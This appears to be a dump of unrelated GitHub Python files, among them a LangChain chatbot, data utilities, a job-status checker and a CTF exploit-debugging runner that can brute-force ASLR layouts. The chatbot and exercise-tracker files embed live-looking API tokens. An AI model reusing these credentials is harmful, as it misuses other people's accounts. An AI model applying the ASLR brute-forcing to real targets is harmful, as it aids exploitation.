1\n\n if 5 in permutes.values():\n freq5 = []\n poss_ans = []\n for freq in permutes:\n if permutes[freq]==5:\n freq5.append(freq)\n \n for cube in cube_lst(cubelen):\n if dig_freq(cube) in freq5:\n poss_ans.append(int(round(cube**(1/3))))\n \n print(poss_ans)\n ans = min(poss_ans)\n assert permutes[dig_freq(ans**3)]==5\n break\n cubelen += 1\n \nprint(ans**3)","repo_name":"simon-mcmahon/project-euler","sub_path":"progress_2018/prob_62.py","file_name":"prob_62.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17791884192","text":"from langchain.chains import ConversationChain\nfrom langchain.chains.conversation.memory import ConversationBufferWindowMemory\nfrom langchain.prompts import (\n SystemMessagePromptTemplate,\n HumanMessagePromptTemplate,\n ChatPromptTemplate,\n MessagesPlaceholder\n)\nimport streamlit as st\nfrom streamlit_chat import message\nfrom utillis import *\nfrom langchain.llms import HuggingFaceHub\nimport os\n\n# Replace 'your_token_value' with your actual Hugging Face API token\nos.environ['HUGGINGFACEHUB_API_TOKEN'] = \"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\"\n\n\nst.subheader(\"Chatbot with Langchain, ChatGPT, Pinecone, and Streamlit\")\n\nif 'responses' not in st.session_state:\n st.session_state['responses'] = [\"How can I assist you?\"]\n\nif 'requests' not in st.session_state:\n st.session_state['requests'] = []\n\nllm = HuggingFaceHub(repo_id=\"google/flan-t5-xxl\", model_kwargs={\"temperature\":0.5, \"max_length\":512})\nif 'buffer_memory' not in st.session_state:\n st.session_state.buffer_memory=ConversationBufferWindowMemory(k=3,return_messages=True)\n\nsystem_msg_template = SystemMessagePromptTemplate.from_template(template=\"\"\"Answer the question as truthfully as possible using the provided context, \nand if the answer is not contained within the text below, say 'I don't know'\"\"\")\n\n\nhuman_msg_template = HumanMessagePromptTemplate.from_template(template=\"{input}\")\n\nprompt_template = ChatPromptTemplate.from_messages([system_msg_template, MessagesPlaceholder(variable_name=\"history\"), human_msg_template])\n\nconversation = ConversationChain(memory=st.session_state.buffer_memory, prompt=prompt_template, llm=llm, verbose=True)\n\n\nresponse_container = st.container()\n# container for text box\ntextcontainer = st.container()\n\nwith textcontainer:\n query = st.text_input(\"Query: \", key=\"input\")\n if query:\n with st.spinner(\"typing\"):\n context=find_match(query)\n response=conversation.predict(input=f\"Context:\\n {context} \\n\\n Query:\\n{query}\")\n st.session_state.requests.append(query)\n st.session_state.responses.append(response)\n\n\nwith response_container:\n if st.session_state['responses']:\n\n for i in range(len(st.session_state['responses'])):\n message(st.session_state['responses'][i],key=str(i))\n if i < len(st.session_state['requests']):\n message(st.session_state[\"requests\"][i], is_user=True,key=str(i)+ '_user')","repo_name":"Jaid844/Chatbot_with_llms","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38008078936","text":"# 함수\n# 다중값 리턴\n\n# n까지의 총합과 평균\ndef multi_return(n):\n if n < 0:\n return\n\n tot = 0\n for x in range(n+1):\n tot += x\n avg = tot / n\n return tot, avg\n\n# n 의 총합과 평균\n# n이 음수이면 모두 0을 리턴\nn = -10\nresult = multi_return(n)\nprint('result=', result) # None\nprint(f'0부터 {n}까지의 총합과 평균')\nif result != None:\n print('총합=', result[0])\n print('평균=', result[1])\n\nprint('총합=', result[0] if result != None else '값이 음수여서 게산하지 않음')\nprint('평균=', result[1] if result != None else '값이 음수여서 게산하지 않음')","repo_name":"jinygod/Programming-Language","sub_path":"python/syntax/functions/s07-function-03-return.py","file_name":"s07-function-03-return.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"22298231456","text":"import os\nimport xml.etree.ElementTree as ET\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport xmltodict\nimport yaml\n\n\n\ndef parse_xmls_as_dataframe(xmls, stop_on_error=False, logger=None) -> pd.DataFrame:\n \"\"\"Parse a bunch of xmls and return a flag dataframe, XML does not have to be present, if it does not exist, no parsing is done.\"\"\"\n df = None\n for xml in xmls:\n if os.path.exists(xml):\n try:\n xml_data: dict = parse_xml_to_dict(xml)\n meta_data = pd.DataFrame(xml_data, index=[0])\n meta_data.columns = [_cleanup(c) for c in meta_data.columns]\n\n if df is None:\n df = meta_data\n else:\n df = df.join(meta_data)\n except Exception as e:\n if logger is not None:\n logger.warn(\"Exception occured while parsing {}: {}\".format(xml, e))\n if not stop_on_error:\n continue\n else:\n raise e\n return df\n\n\ndef parse_xml_to_dict(xml_fp: str, flatten=True) -> dict:\n \"\"\"Parses a XML as an orderd dict. Attributes in the XML will be prefixed with @\"\"\"\n with open(xml_fp) as xml_file:\n data_dict = xmltodict.parse(xml_file.read())\n\n if flatten:\n data_dict = flatten_dict(data_dict)\n return data_dict\n\n\ndef flatten_dict(d: dict, sep=\".\"):\n \"\"\"Recursively flatten a nested dict into a single dict with nested keys becoming Root.Node.Key=XXX, where the separator can be customized\"\"\"\n\n def items():\n for key, value in d.items():\n if isinstance(value, dict):\n for subkey, subvalue in flatten_dict(value).items():\n yield key + sep + subkey, subvalue\n elif isinstance(value, list):\n for i, listval in enumerate(value):\n listkey = \"{}{}\".format(key, i + 1)\n if isinstance(listval, dict):\n for subkey, subvalue in flatten_dict(listval).items():\n yield listkey + sep + subkey, subvalue\n else:\n yield listkey, listval\n else:\n yield key, value\n\n return dict(items())\n\n\ndef substitute(line: str, **extra):\n \"\"\"Performs replacement of all occurences of ${key} in string with `value` passed in as keyword arguments of this function\n i.e. `substitute(line, foo = bar, bo = Rob)` would replace '${foo}' with 'bar' and '${bo}' with 'Rob' in the string line,\n also performs environmental variable substitution\n \"\"\"\n if len(extra) > 0:\n line = deepcopy(line)\n for k, v in extra.items():\n # {{ }} is how we escape the curly braces, the most inner one does the substitution\n line = line.replace(\"${{{}}}\".format(k), str(v))\n return os.path.expandvars(line)\n\n\ndef map_variables(tree: dict, node: dict = None):\n \"\"\"Use DFS to perform variable substitution on values in the config dictionary with other values\n i.e. say there's is a list of nested data structure located at key - ['global']['basepaths']\n\n if we want to use the values defined here elsewhere, we can just use $${global.basepaths}, this will be substituted with the appropriate values at\n config['global]['basepaths']\n\n Before mapping:\n {'global': {'something': 'nothing', 'foo': 'bar', 'fizz': [1, 2, 3, 4, 5]},\n 'plugins': {'overview_simple': '${global.fizz}'}}\n\n\n After mapping:\n {'global': {'something': 'nothing', 'foo': 'bar', 'fizz': [1, 2, 3, 4, 5]},\n 'plugins': {'overview_simple': [1, 2, 3, 4, 5]}}\n \"\"\"\n if node is None:\n node = tree\n\n for k, v in node.items():\n if isinstance(v, dict):\n map_variables(tree, v)\n elif isinstance(v, str) and v.startswith(\"$${\") and v.endswith(\"}\"):\n # 2:-1 removes the ${...} and gives us just the ...\n new_v_path = v[3:-1].split(\".\")\n # get the val\n new_val = tree\n while len(new_v_path) > 0:\n new_val = new_val[new_v_path.pop(0)]\n node[k] = new_val\n\n\ndef load_config(config_file: str, map_var=True, **extra) -> dict:\n \"\"\"Load main config file, and override keys specified in the override config file with the new value\n @params:\n config_file : path to a yaml config file\n extra : a dictionary of config values to be substituted, key appears as \"${key}\" in the config file will\n be substituted with the value in the dictionary\n \"\"\"\n config = {}\n with open(config_file, \"r\") as fin:\n try:\n lines = fin.readlines()\n yaml_string = \"\\n\".join([substitute(line, **extra) for line in lines])\n\n config = yaml.load(yaml_string, Loader=yaml.SafeLoader)\n except yaml.YAMLError as exc:\n config = {}\n\n if map_var:\n map_variables(config)\n return config\n\n\ndef get_xml_file_from_folder(path: str, name: str = None):\n \"\"\"Gets first xml file found in folder\"\"\"\n xml_file = [f for f in os.listdir(path) if f.endswith(\".xml\")]\n if name:\n xml_file = [f for f in xml_file if name.lower() in f.lower()]\n xml_file = xml_file[0]\n return xml_file\n\n\ndef map_col_from_xml(path, c, key, func):\n root = get_xml_root(path)\n d = {}\n\n if not root:\n return\n\n l = root.findall(key)\n\n for n, i in enumerate(l, 1):\n v = func(i)\n d[n] = v\n new_c = c.map(d)\n return new_c\n\n\ndef get_xml_root(p):\n if not os.path.exists(p):\n return\n xml_tree = ET.parse(p)\n root = xml_tree.getroot()\n return root\n\n\ndef get_date_time():\n today = datetime.today().strftime(\"%Y_%m_%d_%H_%M_%S\")\n return today\n\n\ndef average_all_columns_by_group(data, group_list, method=\"mean\"):\n \"Group and take average of numeric columns then merge first non-numeric from each group back in\"\n # Drop NAN col and rows\n data.dropna(inplace=True, axis=0, how=\"all\")\n data.dropna(inplace=True, axis=1, how=\"all\")\n # Reset index\n # data = data.reset_index()\n # list of columns to group by and average\n\n if method == \"std\":\n df = data.groupby(by=group_list, as_index=False, sort=True).std()\n if method == \"mean\":\n df = data.groupby(by=group_list, as_index=False, sort=True).mean(numeric_only=True)\n elif method == \"median\":\n df = data.groupby(by=group_list, as_index=False, sort=True).median(numeric_only=True)\n\n # Get list of columns that were dropped during averaged (wrong type)\n init_columns = list(data.columns)\n post_columns = list(df.columns)\n dropped_list = list_diff(init_columns, post_columns)\n\n if dropped_list:\n dropped_list = dropped_list + group_list\n # Get dropped columns as df\n data = data[dropped_list]\n data = data.groupby(by=group_list, as_index=True).nth(0)\n data = data.applymap(replace_list_with_string)\n if isinstance(data, pd.Series):\n data = data.to_frame().transpose()\n # Merge dropped columns back into averaged data\n df = pd.merge(\n df,\n data,\n how=\"left\",\n left_on=group_list,\n right_index=True,\n )\n return df\n\n\ndef print_time_diff(t1, t2):\n \"\"\"Print difference between two time objects\"\"\"\n seconds = round(t1 - t2, 1)\n hours = round(seconds / 3600, 2)\n print(f\"Time: {hours}h ({seconds}s)\")\n\n\ndef mk_dirs(path):\n dir = Path(path)\n if not dir.exists():\n os.mkdir(dir)\n\n\ndef replace_list_with_string(value):\n if isinstance(value, np.ndarray):\n # value = np.core.defchararray.join(\",\",value)\n value = \",\".join(value)\n return value\n\n\ndef drop_ordered_list_duplicates(l):\n \"\"\"Drop list duplicates (keep order)\"\"\"\n res = [i for n, i in enumerate(l) if i not in l[:n]]\n return res\n\n\ndef drop_unordered_list_duplicates(l):\n \"\"\"Drop list duplicates (don't keep order)\"\"\"\n res = [*set(l)]\n return res\n\n\ndef list_diff(li1, li2):\n li_dif = [i for i in li1 + li2 if i not in li1 or i not in li2]\n return li_dif\n\n\ndef list_intersection(lst1, lst2):\n lst3 = [value for value in lst1 if value in lst2]\n return lst3\n\n\ndef get_items_containing_substring(items, substrings):\n \"\"\"Get list of items containing any of a list of substrings\"\"\"\n substrings = [str(s) for s in substrings]\n items = [i for i in items if any(s in i for s in substrings)]\n return items\n\n\ndef get_root():\n \"\"\"Get path to root dir\"\"\"\n path = os.path.dirname(os.path.realpath(\"__file__\"))\n return path\n\ndef open_csv_chunks(path,**kwargs):\n \"\"\"Open csv using pd.read_csv with chunking\"\"\"\n df_iter = pd.read_csv(path,low_memory=False,chunksize=1000,**kwargs)\n df = pd.concat(df_iter)\n return df","repo_name":"cjgarcia1984/Solitaire","sub_path":"utils/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":8932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21690810538","text":"#!/usr/bin/python\n\nimport sys, os\nimport time\nimport subprocess\n\"\"\"\n\nThe code here is too messy, since it is not modulized.\n\nNow I explain why the tool is used. The tool will provide advantageous\ndebugging assistence with:\n a) customizable init gdb script. With the functionality, I can now\n have my variable to be the base of the main executable, libc, heap,\n etc.\n b) customizable execute method, aka configuration of libc and some\n ASLR pattern. You can change libc real time (not much attractive right?)\n and you can make the connection to have some trait with ASLR (such\n as making libc address to be 0x7fxxxx000000, which is in 1/4096\n chance by natural). When you socat this script, you can configure\n it to bruteforce about the executable, and filter out the \"good\"\n memory layout and make it to be the very service that take effect\n (although the default script here require your exploit to wait before\n good ASLR is present, after which the exp can send payload)\n The ASLR related code is commented by me, but you can use it under\n extreme cases.\n\n\"\"\"\n\n# The most often modified variables\n\n# bruteforce arguments, you may set it to lower value if your PC detests.\n\nMAX_TRIAL = 65536\nMAX_CONCURRENT = 256\n\n# On graphic linux if GDB_POPWINDOW is set, every connection will pop a\n# terminal for one gdb\n# If you use ssh to debug, you can set it to be false, in order to make\n# gdb appear on the very terminal as socat. (but a sad story, you cannot\n# send interrupt to gdb using ^C in this case)\n\nGDB_POPWINDOW = True #False\n\n# If the program runs with a heap (heap is initiated before first input),\n# check it to be true, otherwise, false.\n\n# However it now only affect the module for bruteforcing aslr.\n\nhasHeap = True\nhasLibc = True\n\n# x86-64 or x86-32 deprecated\n\n#is64 = False\n\n# fuzzing mode or exploiting mode\n# fuzzing mode will stop debugger on discovering heap vulnerability\n# although it might be not so useful as we have professional fuzzer\n\nFuzzing = False\n\n# argv of the server\n\nargv = ['./overwatch']\n\n# if you have your custom libc in the same directory, this config is useful\n# else, edit them to your preference\n\ncwd = os.getcwd() + '/'\n\nfilename = argv[0]\n\nlibc = cwd + 'libc.so.6'\n\nenv = {'LD_PRELOAD': libc, 'PATH': '/bin:/usr/bin'}\n\ncustom_exec = ''\n\n# ###### Run our real program, or if you like an ASLR-filtered version\n\n#p = subprocess.Popen(argv, env=env)\np = subprocess.Popen(argv)\n\n# below are generator for a good pattern of ASLR. You can also use the\n# getaslrs function below!\n'''\nfor i in range(MAX_TRIAL):\n if i % 16 == 0: print >> sys.stderr, 'Current attempt: %d' % i\n ps = []\n for j in range(MAX_CONCURRENT):\n ps.append(subprocess.Popen(argv, env=env))\n lucky_id = -1\n for j in range(MAX_CONCURRENT):\n while True:\n with open('/proc/%d/maps' % ps[j].pid, 'r') as f:\n aslr = f.readlines()\n libc_line = [_ for _ in aslr if 'libc.so' in _]\n if len(libc_line) > 0:\n break\n print >> sys.stderr, 'Missed target for %d, %d' % (i, j)\n libc_addr = int(libc_line[0].split()[0].split('-')[0], 16)\n #print >>sys.stderr, hex(libc_addr)\n if libc_addr == 0xf7558000:\n lucky_id = j\n break\n if lucky_id == -1:\n for p in ps:\n p.kill()\n del ps\n else:\n for j in range(MAX_CONCURRENT):\n if j != lucky_id:\n ps[j].kill()\n p = ps[lucky_id]\n break\n'''\n\n# end of <Run our real program>\n\n# ###### Attach gdb (assume peda + libheap + glibc source are ready!!)\n\ngdb_autoexec_filename = '.gdb_autoexec_script'\n\nautoexec = '''\nb abort\n'''\n\ndef extract_addr(s):\n return int(s.split()[0].split('-')[0], 16)\n\n\ndef getaslr(aslr, signiture):\n filter_arr = [_ for _ in aslr if signiture in _]\n if len(filter_arr) == 0:\n return 0\n return extract_addr(filter_arr[0])\n\n\ndef getaslrs(p, retry=True, hasHeap=True, hasLibc=True):\n # main, stack, vdso, libc, heap\n hases = [True, True, True, hasLibc, hasHeap]\n sigs = [argv[0][2:], '[stack]', '[vdso]', 'libc', '[heap]']\n while True:\n with open('/proc/%d/maps' % p.pid, 'r') as f:\n aslr = f.readlines()\n addrs = []\n for i in range(len(sigs)):\n s = sigs[i]\n addr = getaslr(aslr, s)\n if not addr and hases[i]:\n print >> sys.stderr, 'Failed to get aslr of %s' % s\n if retry:\n print >> sys.stderr, 'Retrying.'\n time.sleep(1e-1)\n break\n else:\n return None\n else:\n addrs.append(addr)\n if len(addrs) == len(sigs):\n return addrs\n\n\n#aslr = getaslrs(p, hasHeap=hasHeap, hasLibc=hasLibc)\n\nautoexec += custom_exec\n\nwith open(cwd + gdb_autoexec_filename, 'w') as f:\n f.write(autoexec + '\\n')\n\ngdb_term_argv = [\n '/usr/bin/x-terminal-emulator', '-e', 'gdb-multiarch -q \"%s\" %d -x \"%s\"' %\n (cwd + filename, p.pid, cwd + gdb_autoexec_filename)\n]\n\nif GDB_POPWINDOW:\n gdb_p = subprocess.Popen(\n gdb_term_argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\nelse:\n gdb_p = subprocess.Popen(\n ['/bin/sh', '-c'] + gdb_term_argv[2:], stdin=2, stdout=2)\n\n# end of <Attach gdb>\n\n# following will preventing the ghost connection of the program consuming the cpu\n\n#effective_p = subprocess.Popen(['nc', '0', '9345'])\n\nimport signal\nimport sys\n\n\ndef signal_handler(signal, frame):\n print >> sys.stderr, 'Python killed'\n p.kill()\n exit(-1)\n\n\nsignal.signal(signal.SIGPIPE, signal_handler)\nsignal.signal(signal.SIGTERM, signal_handler)\nsignal.signal(signal.SIGINT, signal_handler)\n\n# wait for the program to die\n\np.wait()\n","repo_name":"ThinerDAS/ctf-util","sub_path":"runner/plain_runner.py","file_name":"plain_runner.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41601017637","text":"import pickle\nimport numpy as np\nimport torch\nimport argparse, logging\n\ndef main(args):\n # save_dir = '/home/think/checkpoints/multi30k/en-de/inverseKD_res_m_l2_1enc'\n syn_f = open(args.save_dir + f'/{args.gen_subset}SynLocal_v.pickle', 'rb')\n org_f = open(args.save_dir + f'/{args.gen_subset}OrgLocal_v.pickle', 'rb')\n\n # load numpy from .pkl file\n syn_out = []\n org_out = []\n while True:\n try:\n syn_i = pickle.load(syn_f)\n org_i = pickle.load(org_f)\n syn_out.append(syn_i)\n org_out.append(org_i)\n except EOFError:\n break\n\n # numpy array\n syn_arr = np.stack(syn_out, axis=0)\n org_arr = np.stack(org_out, axis=0)\n\n # torch tensor\n syn_mat = torch.from_numpy(syn_arr)\n org_mat = torch.from_numpy(org_arr)\n\n # consine similarity\n cos_sim = torch.mm(syn_mat, org_mat.T) / (torch.norm(syn_mat) * torch.norm(org_mat))\n _, indices = cos_sim.topk(k=args.topk, dim=1, largest=True, sorted=True) # sorted by column\n batch = cos_sim.shape[0]\n indexs = torch.arange(0, batch).view(-1, 1).repeat(1, args.topk)\n mask = (indices == indexs)\n rk_score = mask.sum(dim=1).sum(dim=0) / batch\n print(rk_score)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"visual grounding\")\n parser.add_argument(\"--topk\", type=int, metavar='N',\n help=\"top k neighborhood viusal features\")\n parser.add_argument(\"--save-dir\", metavar=\"FP\", default=None,\n help=\"Path to the directory containing pickle files\")\n parser.add_argument('--gen-subset', default='test', metavar='SPLIT',\n help='data subset to generate (train, valid, test)')\n args = parser.parse_args()\n\n print(f'####{args.gen_subset}####')\n print(f'R@{args.topk} Score:', end=\" \")\n main(args)\n\n","repo_name":"pengr/IKD-mmt","sub_path":"scripts/visual_grounding.py","file_name":"visual_grounding.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"71225581240","text":"import requests\r\nimport datetime as dt\r\n\r\n# Nutritionix Details\r\nAPI_KEY = \"991621dcaf81d6f452d925d5b3959a17\"\r\nAPP_ID = \"0d36815d\"\r\nURL = \"https://trackapi.nutritionix.com/v2/natural/exercise\"\r\n\r\nX_APP_ID = {\r\n \"x-app-id\": APP_ID,\r\n \"x-app-key\": API_KEY,\r\n \"x-remote-user-id\": \"0\"\r\n}\r\n\r\nbody = {\r\n \"query\": input(\"Tell me what exercise you did today : \"),\r\n \"gender\": 'male'\r\n\r\n}\r\nresponse = requests.post(url=URL, json=body, headers=X_APP_ID)\r\nexercise_json = response.json()['exercises']\r\n# print(exercise_json, len(exercise_json))\r\n\r\n# (name of event, num_of)calories, time)\r\nactivity_list = [{\"date\": dt.datetime.now().strftime(\"%d/%m/%Y\"), \"time\": dt.datetime.now().strftime(\"%X\"),\r\n \"exercise\": i['name'], \"duration\": i['duration_min'], \"calories\": i['nf_calories']} for i in exercise_json]\r\n\r\nprint(\"Data succesfully acquired and listed\")\r\n\r\n# Working with the sheety API\r\n\r\nsheety_API = \"https://api.sheety.co/6058f50226857081a997dc586d44aa18/workoutTracker/workouts\"\r\n\r\n\r\nfor i in activity_list:\r\n body = {\r\n \"workout\": i\r\n }\r\n response_sheety = requests.post(url=sheety_API, json=body)\r\n print(response_sheety.text)\r\n\r\n\r\n","repo_name":"RhythmBear/100-DAYS-OF-CODE","sub_path":"Day-38-Exercise-Tracker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70397311162","text":"import ast\nfrom matplotlib.colors import LinearSegmentedColormap\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib\n\ndef cmap_fromLut(fname): # converts a .lut file given its path to a LinearSegmentedColormap\n # locate control points number for each color [blue,green,red] and store data\n control_points = []\n data = []\n with open(fname, \"r\") as f:\n for line in f:\n data.append(line.strip())\n if 'Number of Control Points' in line:\n split = line.split(':')\n control_points.append(int(split[1].strip()))\n # locate the\n location = []\n n=0\n for i in data:\n if 'Info' in i:\n location.append(n)\n n+=1\n # separate and store the control points\n points_B = data[location[0]+2:location[0]+2+control_points[0]]\n points_G = data[location[1]+2:location[1]+2+control_points[1]]\n points_R = data[location[2]+2:location[2]+2+control_points[2]]\n\n def convert(list): # to convert from string to array format\n A = []\n for i in list:\n A.append(ast.literal_eval(i.split(':')[1].strip()))\n A = np.array(A)\n sorted_indices = np.argsort(A[:,0])\n arr = A[sorted_indices]\n return arr\n\n points_B = convert(points_B)\n points_G = convert(points_G)\n points_R = convert(points_R)\n #invert the color map to match the original\n points_B[:,1] = 255-points_B[:,1]\n points_G[:,1] = 255-points_G[:,1]\n points_R[:,1] = 255-points_R[:,1]\n\n # Create the colormap\n cmap_lut = LinearSegmentedColormap('lut_colormap', {\n 'red': [(x/255.0, y/255.0, y/255.0) for x, y in points_R],\n 'green': [(x/255.0, y/255.0, y/255.0) for x, y in points_G],\n 'blue': [(x/255.0, y/255.0, y/255.0) for x, y in points_B]\n })\n return cmap_lut\n\n\ndef export_colormap(colormap, filename):\n cmaplist = [colormap(i) for i in range(0,colormap.N,4)]\n colormap = matplotlib.colors.LinearSegmentedColormap.from_list('mcm',cmaplist, colormap.N/4)\n\n with open(filename, 'w') as file:\n file.write(\"WSxM file copyright UAM\\n\")\n file.write(\"New Format Palette. 2001\\n\")\n file.write(\"Image header size: 1143\\n\\n\")\n \n def write_color_points(color_name, color_points):\n file.write(f\"[{color_name} Info]\\n\")\n for i, point in enumerate(color_points):\n file.write(f\" Control Point {i}: ({int(point[0]*255)} , {255-int(point[1]*255)})\\n\")\n file.write(f\" Number of Control Points: {len(color_points)}\\n\\n\")\n \n write_color_points(\"Blue\", colormap._segmentdata['blue'])\n write_color_points(\"Green\", colormap._segmentdata['green'])\n write_color_points(\"Red\", colormap._segmentdata['red'])\n \n file.write(\"[Palette Generation Settings]\\n\")\n file.write(\" Derivate Mode for the last blue Point: Automatic\\n\")\n file.write(\" Derivate Mode for the last green Point: Automatic\\n\")\n file.write(\" Derivate Mode for the last red Point: Automatic\\n\")\n file.write(\" Is there a particular palette index colored?: No\\n\")\n file.write(\" Smooth Blue: No\\n\")\n file.write(\" Smooth Green: No\\n\")\n file.write(\" Smooth Red: No\\n\\n\")\n \n file.write(\"[Header end]\")\n\n","repo_name":"stefanotriv/cmap_wsxmTopy","sub_path":"src/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25375368034","text":"import xlrd\nimport pandas as pd\n\npd.options.mode.chained_assignment = None # default='warn'\n\ndef readEAExcel(ea_file: str) -> pd.DataFrame:\n \"\"\"Loads the data from an excel spreadsheet that is exported from an Engineers Australia myCPD Record.\n\n This imports cpd data from an excel spreadsheet that uses from the Engineers Australia myCPD format. The data cleaned and put into a pandas.DataFrame which is returned. The function insertDataframe() from this same module needs to be called to write the contents of the dataframe in to the current CPEngLog database. \n \n Arguments:\n ea_file -- the path the to the myCPD Record xlsx file, including file extension.\n \n Returns:\n None if error,otherwise a pandas.DataFrame object containing the imported data.\n \"\"\"\n raw_data = pd.read_excel(ea_file, sheet_name=0, nrows=1)\n headerText = raw_data.columns[0]\n if headerText.find('CPD ACTIVITY REPORT') >= 0:\n raw_data = pd.read_excel(ea_file, sheet_name=0, skiprows=[0])\n new_data = raw_data.iloc[::2, :] #Each observation is split over two rows. Get the odd rows\n evenrows = raw_data.iloc[1::2, :] #Get the even rows\n new_data['Learning outcome'] = evenrows['END DATE'].values\n new_data.drop(columns=['REF NO', 'Unnamed: 14'], inplace=True)\n new_data.columns = ['Type', 'Start date', 'End date', 'Activity', 'Topic','Provider', 'EA Division', 'Location', 'Hours: total', 'Hours: risk management', 'Hours: business and management', 'Hours: area of practice', 'Notes', 'Learning outcome']\n new_data['Start date'] = pd.to_datetime(new_data['Start date'])\n new_data['End date'] = pd.to_datetime(new_data['End date'])\n new_data['Type'] = new_data['Type'].map(lambda x: x.lstrip('Type '))\n new_data.reset_index(drop=True, inplace=True)\n return new_data\n else:\n return None","repo_name":"PlatypusTechnical/CPEngLog","sub_path":"cpenglog/readData.py","file_name":"readData.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5743686320","text":"#!/usr/bin/env python3\nimport re\nimport subprocess as sp\nimport shlex\nimport sys\nimport time\nimport logging\nimport os\n\nlogger = logging.getLogger(\"__name__\")\nlogger.setLevel(40)\n\nSTATUS_ATTEMPTS = 20\n\njobid = int(sys.argv[1])\njob_status = \"running\"\nusername = os.getlogin()\ncell = os.getenv('SGE_CELL')\nsge_root = os.getenv('SGE_ROOT')\ndef checkjob(jobid):\n results = sp.check_output(['tail', '-10000', f'{sge_root}/{cell}/common/accounting']).decode().split('\\n')\n for line in results:\n l = line.split(':')\n if len(l) == 1: \n break \n if l[5] == str(jobid) and l[3] == username:\n if re.search(r'^snakejob\\.', l[4]):\n return int(l[12])\n raise sp.CalledProcessError(1, \"check jobs\")\n\n# WARNING this currently has no support for task array jobs\n\nfor i in range(STATUS_ATTEMPTS):\n # first try qstat to see if job is running\n # we can use `qstat -s pr -u \"*\"` to check for all running and pending jobs\n try:\n qstat_res = sp.check_output(shlex.split(f\"qstat -s pr\")).decode().strip()\n\n # skip the header using [2:]\n res = {\n int(x.split()[0]) : x.split()[4] for x in qstat_res.splitlines()[2:]\n }\n\n # job is in an unspecified error state\n if \"E\" in res[jobid]:\n job_status = \"failed\"\n break\n\n job_status = \"running\"\n break\n\n except sp.CalledProcessError as e:\n logger.error(\"qstat process error\")\n logger.error(e)\n except KeyError as e:\n # if the job has finished it won't appear in qstat and we should check qacct\n # this will also provide the exit status (0 on success, 128 + exit_status on fail)\n # Try getting job with scontrol instead in case sacct is misconfigured\n try:\n # qacct_res = sp.check_output(shlex.split(f\"qacct -j {jobid} -o {username}\"))\n\n exit_code = checkjob(jobid)\n if exit_code == 0:\n job_status = \"success\"\n break\n\n if exit_code != 0:\n job_status = \"failed\"\n break\n\n except sp.CalledProcessError as e:\n logger.warning(\"qacct process error\")\n logger.warning(e)\n if i >= STATUS_ATTEMPTS - 1:\n job_status = \"failed\"\n break\n else:\n # qacct can be quite slow to update on large servers\n time.sleep(5)\n pass\n\nprint(job_status)\n","repo_name":"AndrewsLabUCSF/sge-wynton","sub_path":"sge-status.py","file_name":"sge-status.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"11207681420","text":"# Python Program to find Sum of Even and Odd Numbers in a List\n\n\ndef even_sum(num_list):\n evensum = 0\n for j in range(int):\n if num_list[j] % 2 == 0:\n evensum = evensum + num_list[j]\n return evensum\n\n","repo_name":"amberlowe1001/automation-algorithms1","sub_path":"algoriyhms-4/example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44089988705","text":"\"\"\"\nScript to verify advantages of agents using Upper-Confidence-Bounds action-value estimates over\nagents using Sample-Average estimates in stationary problems, presented in Sutton \n(Reinforcement Learning 2018) p.36 fig 2.4\n\"\"\"\n\nfrom common.enviroments import Enviroment, StatTestbed\nfrom common.agents import SAAgent, UCB_SAAgent\nfrom common.utils import compare\nfrom pathlib import Path\n\ndef main():\n k = 10\n c = 2\n epsilon = 0.1\n agents = [SAAgent(epsilon, k), UCB_SAAgent(c, k)]\n testbed = StatTestbed(k)\n iterations = 2000\n plays = 1000\n\n env = Enviroment(agents, testbed, iterations, plays)\n path = Path(__file__).resolve() # Path (and file name) to save the image\n\n compare(env, path)\n\nif __name__ == \"__main__\":\n main()","repo_name":"pfontana96/rl-research","sub_path":"bandit-algorithms/ucb_vs_e-greedy.py","file_name":"ucb_vs_e-greedy.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2992833057","text":"#!/usr/bin/env python\n\nimport context\nimport nbateammatechain.utils.serialize as serialize\nimport nbateammatechain.players.build_teammates as build_teammates\nimport unittest2 as unittest\n\nclass testSerialize(unittest.TestCase):\n \"\"\"\n Tests for proper serialization of objects within objects\n \"\"\"\n @classmethod\n def setUpClass(cls):\n \"\"\"\n Initialize dictionary objects\n \"\"\"\n filename = \"test_serialize_teammates.pickle\"\n cls.dict = build_teammates.full_teammates()\n serialize.create_pickle(filename, cls.dict)\n cls.dict2 = serialize.load_pickle(filename)\n\n def test_obj_within_dict(self):\n \"\"\"\n Tests that the teammate objects are correct\n \"\"\"\n self.assertTrue(cmp(self.dict['thornma01'].teammates, \n 